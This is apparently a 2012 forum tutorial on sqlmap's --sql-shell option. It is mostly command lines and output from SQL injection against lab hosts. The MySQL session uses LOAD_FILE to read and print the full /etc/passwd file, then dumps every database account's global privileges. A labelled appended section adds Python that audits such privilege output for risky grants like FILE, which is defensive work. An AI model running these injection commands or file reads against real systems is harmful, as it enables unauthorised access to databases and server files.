279 SQLMAP SQL SHELL
Posted on 2012-9-29 00:14:18
--sql-shell: run database statements through the injection point
    root@Dis9Team:~# sqlmap -u http://5.5.5.3/get.asp?id=1 --sql-shell
    sql-shell> sp_configure
    [21:52:56] [INFO] fetching SQL query output: 'sp_configure '
    [21:52:56] [INFO] resumed: None
    sp_configure :    'None'
    sql-shell> select convert(varchar(30),login_time,120) from master..sysprocesses where spid=1
    [21:53:04] [INFO] fetching SQL SELECT statement query output: 'select convert(varchar(30),login_time,120) from master..sysprocesses where spid=1 '
    [21:53:04] [INFO] retrieved: 2012-09-10 12:26:59
    select convert(varchar(30),login_time,120) from master..sysprocesses where spid=1 :    '2012-09-10 12:26:59'
    sql-shell>
The same works for MySQL:
    root@Dis9Team:~# sqlmap -u http://5.5.5.8/pen/news.php?id=1 --sql-shell
    sql-shell> SELECT LOAD_FILE('/etc/passwd')
    [21:55:13] [INFO] fetching SQL SELECT statement query output: 'SELECT LOAD_FILE('/etc/passwd')'
    SELECT LOAD_FILE('/etc/passwd'):    'root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\nsys:x:3:3:sys:/dev:/bin/sh\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/bin/sh\nman:x:6:12:man:/var/cache/man:/bin/sh\nlp:x:7:7:lp:/var/spool/lpd:/bin/sh\nmail:x:8:8:mail:/var/mail:/bin/sh\nnews:x:9:9:news:/var/spool/news:/bin/sh\nuucp:x:10:10:uucp:/var/spool/uucp:/bin/sh\nproxy:x:13:13:proxy:/bin:/bin/sh\nwww-data:x:33:33:www-data:/var/www:/bin/sh\nbackup:x:34:34:backup:/var/backups:/bin/sh\nlist:x:38:38:Mailing List Manager:/var/list:/bin/sh\nirc:x:39:39:ircd:/var/run/ircd:/bin/sh\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh\nnobody:x:65534:65534:nobody:/nonexistent:/bin/sh\nlibuuid:x:100:101::/var/lib/libuuid:/bin/sh\nsyslog:x:101:103::/home/syslog:/bin/false\nmessagebus:x:102:105::/var/run/dbus:/bin/false\navahi-autoipd:x:103:108:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false\navahi:x:104:109:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false\nusbmux:x:105:46:usbmux daemon,,,:/home/usbmux:/bin/false\ngdm:x:106:114:Gnome Display Manager:/var/lib/gdm:/bin/false\nspeech-dispatcher:x:107:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh\nkernoops:x:108:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false\npulse:x:109:116:PulseAudio daemon,,,:/var/run/pulse:/bin/false\nrtkit:x:110:119:RealtimeKit,,,:/proc:/bin/false\nhplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false\nsaned:x:112:121::/home/saned:/bin/false\nbrk:x:1000:1000:Dis9Team,,,:/home/brk:/bin/bash\npostgres:x:113:123:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash\nsmmta:x:114:124:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false\nsmmsp:x:115:125:Mail Submission Program,,,:/var/lib/sendmail:/bin/false\nvboxadd:x:999:1::/var/run/vboxadd:/bin/false\nsshd:x:116:65534::/var/run/sshd:/usr/sbin/nologin\nmysql:x:1001:110::/home/mysql:/bin/false\n'
    sql-shell> SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges
    [21:57:06] [INFO] fetching SQL SELECT statement query output: 'SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges'
    SELECT grantee,privilege_type,is_grantable FROM information_schema.user_privileges [108]:
    [*] 'root'@'localhost', SELECT, YES
    [*] 'root'@'localhost', INSERT, YES
    [*] 'root'@'localhost', UPDATE, YES
    [*] 'root'@'localhost', DELETE, YES
    [*] 'root'@'localhost', CREATE, YES
    [*] 'root'@'localhost', DROP, YES
    [*] 'root'@'localhost', RELOAD, YES
    [*] 'root'@'localhost', SHUTDOWN, YES
    [*] 'root'@'localhost', PROCESS, YES
    [*] 'root'@'localhost', FILE, YES
    [*] 'root'@'localhost', REFERENCES, YES
    [*] 'root'@'localhost', INDEX, YES
    [*] 'root'@'localhost', ALTER, YES
    [*] 'root'@'localhost', SHOW DATABASES, YES
    [*] 'root'@'localhost', SUPER, YES
    [*] 'root'@'localhost', CREATE TEMPORARY TABLES, YES
    [*] 'root'@'localhost', LOCK TABLES, YES
    [*] 'root'@'localhost', EXECUTE, YES
    [*] 'root'@'localhost', REPLICATION SLAVE, YES
    [*] 'root'@'localhost', REPLICATION CLIENT, YES
    [*] 'root'@'localhost', CREATE VIEW, YES
    [*] 'root'@'localhost', SHOW VIEW, YES
    [*] 'root'@'localhost', CREATE ROUTINE, YES
    [*] 'root'@'localhost', ALTER ROUTINE, YES
    [*] 'root'@'localhost', CREATE USER, YES
    [*] 'root'@'localhost', EVENT, YES
    [*] 'root'@'localhost', TRIGGER, YES
    [*] 'root'@'ubuntu', SELECT, YES
    [*] 'root'@'ubuntu', INSERT, YES
    [*] 'root'@'ubuntu', UPDATE, YES
    [*] 'root'@'ubuntu', DELETE, YES
    [*] 'root'@'ubuntu', CREATE, YES
    [*] 'root'@'ubuntu', DROP, YES
    [*] 'root'@'ubuntu', RELOAD, YES
    [*] 'root'@'ubuntu', SHUTDOWN, YES
    [*] 'root'@'ubuntu', PROCESS, YES
    [*] 'root'@'ubuntu', FILE, YES
    [*] 'root'@'ubuntu', REFERENCES, YES
    [*] 'root'@'ubuntu', INDEX, YES
    [*] 'root'@'ubuntu', ALTER, YES
    [*] 'root'@'ubuntu', SHOW DATABASES, YES
    [*] 'root'@'ubuntu', SUPER, YES
    [*] 'root'@'ubuntu', CREATE TEMPORARY TABLES, YES
    [*] 'root'@'ubuntu', LOCK TABLES, YES
    [*] 'root'@'ubuntu', EXECUTE, YES
    [*] 'root'@'ubuntu', REPLICATION SLAVE, YES
    [*] 'root'@'ubuntu', REPLICATION CLIENT, YES
    [*] 'root'@'ubuntu', CREATE VIEW, YES
    [*] 'root'@'ubuntu', SHOW VIEW, YES
    [*] 'root'@'ubuntu', CREATE ROUTINE, YES
    [*] 'root'@'ubuntu', ALTER ROUTINE, YES
    [*] 'root'@'ubuntu', CREATE USER, YES
    [*] 'root'@'ubuntu', EVENT, YES
    [*] 'root'@'ubuntu', TRIGGER, YES
    [*] 'root'@'127.0.0.1', SELECT, YES
    [*] 'root'@'127.0.0.1', INSERT, YES
    [*] 'root'@'127.0.0.1', UPDATE, YES
    [*] 'root'@'127.0.0.1', DELETE, YES
    [*] 'root'@'127.0.0.1', CREATE, YES
    [*] 'root'@'127.0.0.1', DROP, YES
    [*] 'root'@'127.0.0.1', RELOAD, YES
    [*] 'root'@'127.0.0.1', SHUTDOWN, YES
    [*] 'root'@'127.0.0.1', PROCESS, YES
    [*] 'root'@'127.0.0.1', FILE, YES
    [*] 'root'@'127.0.0.1', REFERENCES, YES
    [*] 'root'@'127.0.0.1', INDEX, YES
    [*] 'root'@'127.0.0.1', ALTER, YES
    [*] 'root'@'127.0.0.1', SHOW DATABASES, YES
    [*] 'root'@'127.0.0.1', SUPER, YES
    [*] 'root'@'127.0.0.1', CREATE TEMPORARY TABLES, YES
    [*] 'root'@'127.0.0.1', LOCK TABLES, YES
    [*] 'root'@'127.0.0.1', EXECUTE, YES
    [*] 'root'@'127.0.0.1', REPLICATION SLAVE, YES
    [*] 'root'@'127.0.0.1', REPLICATION CLIENT, YES
    [*] 'root'@'127.0.0.1', CREATE VIEW, YES
    [*] 'root'@'127.0.0.1', SHOW VIEW, YES
    [*] 'root'@'127.0.0.1', CREATE ROUTINE, YES
    [*] 'root'@'127.0.0.1', ALTER ROUTINE, YES
    [*] 'root'@'127.0.0.1', CREATE USER, YES
    [*] 'root'@'127.0.0.1', EVENT, YES
    [*] 'root'@'127.0.0.1', TRIGGER, YES
    [*] 'debian-sys-maint'@'localhost', SELECT, YES
    [*] 'debian-sys-maint'@'localhost', INSERT, YES
    [*] 'debian-sys-maint'@'localhost', UPDATE, YES
    [*] 'debian-sys-maint'@'localhost', DELETE, YES
    [*] 'debian-sys-maint'@'localhost', CREATE, YES
    [*] 'debian-sys-maint'@'localhost', DROP, YES
    [*] 'debian-sys-maint'@'localhost', RELOAD, YES
    [*] 'debian-sys-maint'@'localhost', SHUTDOWN, YES
    [*] 'debian-sys-maint'@'localhost', PROCESS, YES
    [*] 'debian-sys-maint'@'localhost', FILE, YES
    [*] 'debian-sys-maint'@'localhost', REFERENCES, YES
    [*] 'debian-sys-maint'@'localhost', INDEX, YES
    [*] 'debian-sys-maint'@'localhost', ALTER, YES
    [*] 'debian-sys-maint'@'localhost', SHOW DATABASES, YES
    [*] 'debian-sys-maint'@'localhost', SUPER, YES
    [*] 'debian-sys-maint'@'localhost', CREATE TEMPORARY TABLES, YES
    [*] 'debian-sys-maint'@'localhost', LOCK TABLES, YES
    [*] 'debian-sys-maint'@'localhost', EXECUTE, YES
    [*] 'debian-sys-maint'@'localhost', REPLICATION SLAVE, YES
    [*] 'debian-sys-maint'@'localhost', REPLICATION CLIENT, YES
    [*] 'debian-sys-maint'@'localhost', CREATE VIEW, YES
    [*] 'debian-sys-maint'@'localhost', SHOW VIEW, YES
    [*] 'debian-sys-maint'@'localhost', CREATE ROUTINE, YES
    [*] 'debian-sys-maint'@'localhost', ALTER ROUTINE, YES
    [*] 'debian-sys-maint'@'localhost', CREATE USER, YES
    [*] 'debian-sys-maint'@'localhost', EVENT, YES
    [*] 'debian-sys-maint'@'localhost', TRIGGER, YES
    sql-shell>

I suggest capturing its packets with BS; there's a surprise.
For example:
http://3g-sec.com/sqlmap/279/mysql.txt

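Only after playing a thousand tunes does one understand music; only after examining a thousand swords does one recognize a fine blade.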
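
Added example, not part of the original post: in the MySQL session above the injected queries run as an account with the global FILE privilege, which LOAD_FILE() requires, so the read of /etc/passwd succeeds. The Python code below parses privilege rows in that output layout and reports which accounts hold high-risk global privileges; the HIGH_RISK set, the constructed SAMPLE rows and the 'webapp'@'localhost' account are assumptions made for this illustration.

```python
import re
from collections import defaultdict

# Assumption for this example: global privileges treated as high risk for an
# application account. FILE is the one LOAD_FILE() depends on.
HIGH_RISK = {"FILE", "SUPER", "SHUTDOWN", "PROCESS", "RELOAD", "CREATE USER"}

# Constructed sample in the "[*] grantee, privilege, is_grantable" layout of
# the session output; 'webapp'@'localhost' is a hypothetical restricted account.
SAMPLE = """\
[*] 'root'@'localhost', SELECT, YES
[*] 'root'@'localhost', FILE, YES
[*] 'root'@'localhost', SUPER, YES
  63. [*] 'root'@'127.0.0.1', FILE, YES
[*] 'debian-sys-maint'@'localhost', SHUTDOWN, YES
[*] 'webapp'@'localhost', USAGE, NO
"""

# The optional leading "NN." tolerates forum-style line numbering.
ROW = re.compile(
    r"^\s*(?:\d+\.\s*)?\[\*\]\s*('[^']*'@'[^']*'),\s*([A-Z ]+?),\s*(YES|NO)\s*$"
)

def parse_rows(text):
    """Yield (grantee, privilege, grantable) for each well-formed row."""
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3) == "YES"

def audit(text):
    """Map each grantee to its sorted high-risk global privileges."""
    risky = defaultdict(set)
    for grantee, priv, _grantable in parse_rows(text):
        if priv in HIGH_RISK:
            risky[grantee].add(priv)
    return {g: sorted(p) for g, p in risky.items()}

def can_read_server_files(text, grantee):
    """True if the account holds FILE, the privilege LOAD_FILE() requires."""
    return "FILE" in audit(text).get(grantee, [])

if __name__ == "__main__":
    for grantee, privs in audit(SAMPLE).items():
        print(f"{grantee}: {', '.join(privs)}")
```

An account used by a web application should appear in this view with USAGE only, with its rights granted at the schema or table level instead.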
